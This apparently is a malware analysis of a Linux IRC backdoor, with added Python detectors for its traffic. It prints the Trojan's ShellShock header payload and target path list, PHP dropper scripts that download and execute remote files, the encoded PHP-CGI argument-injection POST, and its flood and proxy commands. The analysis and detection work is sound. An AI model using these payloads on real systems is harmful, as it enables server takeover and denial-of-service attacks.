A backdoor for Linux that receives commands from cybercriminals through a chat server supporting the IRC (Internet Relay Chat) protocol. Once launched on the infected computer, the Trojan registers itself for autorun via the “/etc/init.d/rc.local” file or, if no such file exists, the “/etc/rc.conf” file. It then reads its own executable file “/tmp/Help1”, encodes the contents with base64 and saves the result to “/tmp/Help1.z”; it does the same for “/tmp/Help2” and “/tmp/Help2.z”. After that the Trojan connects to the command and control server and sends it the following request:

```
PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\n
```

where %pass% is "44", and %nick%, %user% and %uptime% are strings produced by the following routine (decompiler output):
```c
#include <stdlib.h>
#include <string.h>
#include <sys/sysinfo.h>

/* Decompiled routine that builds the 20-character %nick%/%user%/%uptime% string:
 * 20 random capital letters, overwritten at the start with "mumu-" and, once the
 * system uptime exceeds a threshold, a bracketed day marker. Thresholds are in
 * seconds: 0xD2F00 = 864000 = 10 days, 0x83D600 = 8640000 = 100 days,
 * 0x2932E00 = 43200000 = 500 days. */
char *GetUptime()
{
  char *szUptime;
  signed int i;
  struct sysinfo info;

  szUptime = (char *)malloc(0x15u);      /* 20 characters plus NUL terminator */
  i = 0;
  memset(szUptime, 0, 0x15u);
  do
    szUptime[i++] = rand() % 26 + 'A';   /* fill with random capitals */
  while ( i < 20 );
  *szUptime = 'm';
  szUptime[1] = 'u';
  szUptime[2] = 'm';
  szUptime[3] = 'u';
  szUptime[4] = '-';
  sysinfo(&info);
  if ( info.uptime > 0xD2F00 )           /* more than 10 days: "[10]-" */
  {
    szUptime[5] = '[';
    szUptime[6] = '1';
    szUptime[7] = '0';
    szUptime[8] = ']';
    szUptime[9] = '-';
    if ( info.uptime > 0x1A5E00 )        /* 20 days */
    {
      szUptime[6] = '2';
      if ( info.uptime > 0x278D00 )      /* 30 days */
      {
        szUptime[6] = '3';
        if ( info.uptime > 0x34BC00 )    /* 40 days */
        {
          szUptime[6] = '4';
          if ( info.uptime > 0x41EB00 )  /* 50 days */
          {
            szUptime[6] = '5';
            if ( info.uptime > 0x4F1A00 )  /* 60 days */
            {
              szUptime[6] = '6';
              if ( info.uptime > 0x5C4900 )  /* 70 days */
              {
                szUptime[6] = '7';
                if ( info.uptime > 0x697800 )  /* 80 days */
                {
                  szUptime[6] = '8';
                  if ( info.uptime > 0x76A700 )  /* 90 days */
                  {
                    szUptime[6] = '9';
                    if ( info.uptime > 0x83D600 )  /* 100 days: marker grows to "[100]-" */
                    {
                      szUptime[6] = '1';
                      szUptime[8] = '0';
                      szUptime[9] = ']';
                      szUptime[10] = '-';
                      if ( info.uptime > 0xC5C100 )  /* 150 days */
                      {
                        szUptime[7] = '5';
                        if ( info.uptime > 0x107AC00 )  /* 200 days */
                        {
                          szUptime[6] = '2';
                          szUptime[7] = '0';
                          if ( info.uptime > 0x18B8200 )  /* 300 days */
                          {
                            szUptime[6] = '3';
                            if ( info.uptime > 0x20F5800 )  /* 400 days */
                            {
                              szUptime[6] = '4';
                              if ( info.uptime > 0x2932E00 )  /* 500 days */
                                szUptime[6] = '5';
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return szUptime;
}
```
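As an added example (not code from Dr.Web or from the Trojan itself), the Python below restates the nick-building routine as a threshold table, which makes the nested cascade above readable, and turns the resulting fixed shape of the string (20 characters, "mumu-" prefix, optional bracketed day marker, capitals only) into a check that can be run over IRC session text. The sample handshake lines are constructed to match the template above, not captured traffic.

```python
import random
import re

# Uptime thresholds (seconds) from GetUptime() and the day label written into the
# nick once uptime exceeds them; the label is that of the highest bucket exceeded.
# 0xD2F00 = 864000 s = 10 days ... 0x2932E00 = 43200000 s = 500 days.
UPTIME_BUCKETS = [
    (0xD2F00, 10), (0x1A5E00, 20), (0x278D00, 30), (0x34BC00, 40),
    (0x41EB00, 50), (0x4F1A00, 60), (0x5C4900, 70), (0x697800, 80),
    (0x76A700, 90), (0x83D600, 100), (0xC5C100, 150), (0x107AC00, 200),
    (0x18B8200, 300), (0x20F5800, 400), (0x2932E00, 500),
]


def uptime_tag(uptime_seconds):
    """Bracketed day marker the Trojan inserts after "mumu-", or "" under 10 days."""
    tag = ""
    for threshold, days in UPTIME_BUCKETS:
        if uptime_seconds > threshold:      # strict comparison, as in the C code
            tag = "[%d]-" % days
    return tag


def build_nick(uptime_seconds, rng=None):
    """Re-implementation of GetUptime(): 20 random capitals, then "mumu-" and the
    uptime marker overwrite the start of the buffer."""
    rng = rng or random.Random()
    buf = [chr(ord("A") + rng.randrange(26)) for _ in range(20)]
    prefix = "mumu-" + uptime_tag(uptime_seconds)
    buf[:len(prefix)] = list(prefix)
    return "".join(buf)


# Detection side: the shape is stable because the random part is always padded
# to exactly 20 characters and the marker can only take the values above.
SESSOX_NICK_RE = re.compile(r"^mumu-(?:\[(?:[1-9]0|[1-5]00|150)\]-)?[A-Z]+$")


def is_sessox_nick(name):
    return len(name) == 20 and SESSOX_NICK_RE.match(name) is not None


def scan_irc_log(text):
    """Return (line_number, name) for NICK/USER lines whose name has the Sessox shape."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("NICK", "USER") and is_sessox_nick(parts[1]):
            hits.append((lineno, parts[1]))
    return hits


# Constructed sample handshake (not a real capture) in the shape of the C2 request.
SAMPLE_IRC = (
    "PASS 44\n"
    "NICK mumu-[10]-QWERTYUIOP\n"
    "USER mumu-ABCDEFGHIJKLMNO localhost localhost :mumu-[10]-ZXCVBNMASD\n"
    "NICK friendlyuser\n"
)

if __name__ == "__main__":
    print(build_nick(9_000_000, random.Random(1)))
    for lineno, name in scan_irc_log(SAMPLE_IRC):
        print("line %d: suspicious name %s" % (lineno, name))
```

The `PASS 44` line and the identical shape of the NICK, USER and real-name fields are the strongest combined signal; a nick match alone is worth an alert only on a network where IRC is not expected at all.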
The Trojan can execute the following commands:
| Command | Meaning |
|---|---|
| 376 | Specify the mode and log in to the IRC channel |
| 433 | Forward information about the computer’s working time (uptime) to the IRC channel |
| 422 | Specify the mode and log in to the IRC channel |
| PING | Send the PONG reply |
| NICK | Change the nickname to the one specified in the command |
| PRIVMSG | Execute one of the special functions (see below) |
Special functions:
| Command | Meaning |
|---|---|
| PHPSCAN | Start a scan for PHP scripts (PHP Scanner) |
| SOCKS5 | Start the proxy server (SOCKS5 Proxy) |
| SSSCAN | Start scanning for the ShellShock vulnerability (ShellShock Scanner) |
| WEBDOS | Launch an attack on the specified website using repeated GET requests (HTTP Flooder) |

On command, the Trojan can attack a website specified by the criminals by sending it repeated GET requests. It can also scan the targeted server for the ShellShock vulnerability, which allows arbitrary code to be executed on the server. The Trojan carries the following list of paths that it substitutes into the GET request:

```
/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi
```

The payload delivered through these requests is the following PHP script (shown as the Trojan's template, with %s placeholders that are filled in at runtime):
```php
$a = "%s";                     // URL of the first file to download
$b = "%s";                     // URL of the second file to download
$c = sys_get_temp_dir();
$d = "%s";                     // name to save the first file under
$e = "%s";                     // name to save the second file under
$f = "chmod 777";
$g = "file_put_contents";      // function names kept in strings and called as $g(...)
$h = "system";
$i = "file_exists";
$j = "fopen";
if ($i($c . "/$d"))
{
    exit(1);                   // already dropped on this host
} else {
    echo($c);
    $g("$c/$d", $j("$a", "r"));
    $g("$c/$e", $j("$b", "r"));
    $h("$f " . $c . "/$d");
    $h("$f " . $c . "/$e");
    $h($c . "/$d");
    $h($c . "/$e");
}
```

In this script, the URLs of the Trojan's downloadable files are assigned to the variables $a and $b, and the names under which those files are to be saved are assigned to $d and $e.

From these data, the following GET request is generated:

```
GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\n
```

where %file% is one of the paths from the list above and %script% is the script above. The host that receives the GET requests is chosen by generating a random IP address.

Using specially crafted POST requests, the malware scans for PHP CGI scripts in order to launch a third-party script on the compromised server. The recipient host is again a randomly generated IP address. The POST request is built from the following script:

```php
<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";
$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
exit(1);
}else{
echo($a);
$bufferf = $g($bufferf);
$bufferf2 = $g($bufferf2);
$f(\"$a/$b\", $bufferf);
$f(\"$a/$c\", $bufferf2);
$h ($a.\"/\".$b,0777);
$e(\"$d \" . $a .\"/$b\");
$h ($a.\"/\".$c,0777);
$e(\"$d \" . $a .\"/$c\");
$e($a . \"/$c\");
$e($a . \"/$b\");
exit(1);
}
?>
```

(The script is stored in the binary with escaped quotes, as shown.) Here the contents of /tmp/Help1.z and /tmp/Help2.z (the backdoor's body in base64) are assigned to $bufferf and $bufferf2 respectively, and the file names “Help1” and “Help2” are assigned to $b and $c.

The request can be sent to the following paths:

```
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.bin
```

The script is then inserted into the POST request:

```
POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%
```

where %file% is a path from the list above, %ip% is the random IP address, %len% is the size of the script and %script% is the script described above. The query string is a printf-style template (hence the doubled %%); once decoded it is a series of php.ini `-d` overrides passed to the PHP CGI binary.
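As an added defender-side example (not code from the page's author or from the Trojan), the Python below parses raw HTTP requests and flags the two request shapes described in this write-up: a header value that begins with the ShellShock function-definition prefix `() { :;} ;`, and a query string that percent-decodes to php.ini `-d` overrides aimed at a PHP CGI binary. The sample requests are constructed to match the two templates above rather than captured; the `printf_template` flag collapses the doubled `%%` of the template as printed on the page so that it can be decoded as well.

```python
import re
from urllib.parse import unquote

# Header values with a bash function definition followed by a command separator.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
# "-d name=value" php.ini overrides inside a decoded query string.
PHP_DIRECTIVE_RE = re.compile(r"(?:^|\s)-d\s+([A-Za-z_.]+)=")
# Paths the write-up lists for the POST variant.
PHP_CGI_PATHS = {"/cgi-bin/php", "/cgi-bin/php5", "/cgi-bin/php-cgi",
                 "/cgi-bin/php5-cgi", "/cgi-bin/php-cgi.bin"}


def decode_query(query, printf_template=False):
    """Percent-decode a query string ('+' is a space). printf_template=True first
    turns the '%%' of a C format template (as printed on the page) into '%'."""
    if printf_template:
        query = query.replace("%%", "%")
    return unquote(query.replace("+", " "))


def php_cgi_directives(query, printf_template=False):
    """Names of php.ini settings overridden via -d in the query string, in order."""
    return PHP_DIRECTIVE_RE.findall(decode_query(query, printf_template))


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, query, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, query, headers, body


def classify_request(raw):
    """Return a list of finding strings; an empty list means nothing matched."""
    method, path, query, headers, _body = parse_request(raw)
    findings = []
    hit_headers = sorted(n for n, v in headers.items() if SHELLSHOCK_RE.search(v))
    if hit_headers:
        findings.append("shellshock-header:" + ",".join(hit_headers))
    directives = php_cgi_directives(query)
    if directives:
        tag = "php-cgi-arg-injection"
        if path in PHP_CGI_PATHS:
            tag += "(known-path)"
        findings.append(tag + ":" + ",".join(directives))
    return findings


# Constructed samples shaped like the page's two templates (not real traffic).
# Sample 2's query decodes to "-d allow_url_include=on -d auto_prepend_file=php://input -n".
SAMPLE_REQUESTS = [
    "GET /cgi-bin/test.cgi HTTP/1.0\r\n"
    "Cookie: () { :;} ;echo;/usr/bin/php -r %script%\r\n"
    "Referer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\n",
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%6E HTTP/1.1\r\nHost: 203.0.113.5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n"
    "Connection: close\r\n\r\n<?php ... ?>",
    "GET /cgi-bin/status/status.cgi?view=1 HTTP/1.0\r\nHost: 203.0.113.5\r\n"
    "User-Agent: curl/7.64.0\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(raw.split("\r\n", 1)[0][:60], "->", classify_request(raw) or "clean")
```

Decoding before matching matters: the `-d` overrides (`auto_prepend_file=php://input` in particular, which makes the POST body execute as PHP) are invisible to a plain substring rule on the raw URL, and the ShellShock check is applied to every header value rather than only `User-Agent`, because this sample uses `Cookie` and `Referer`.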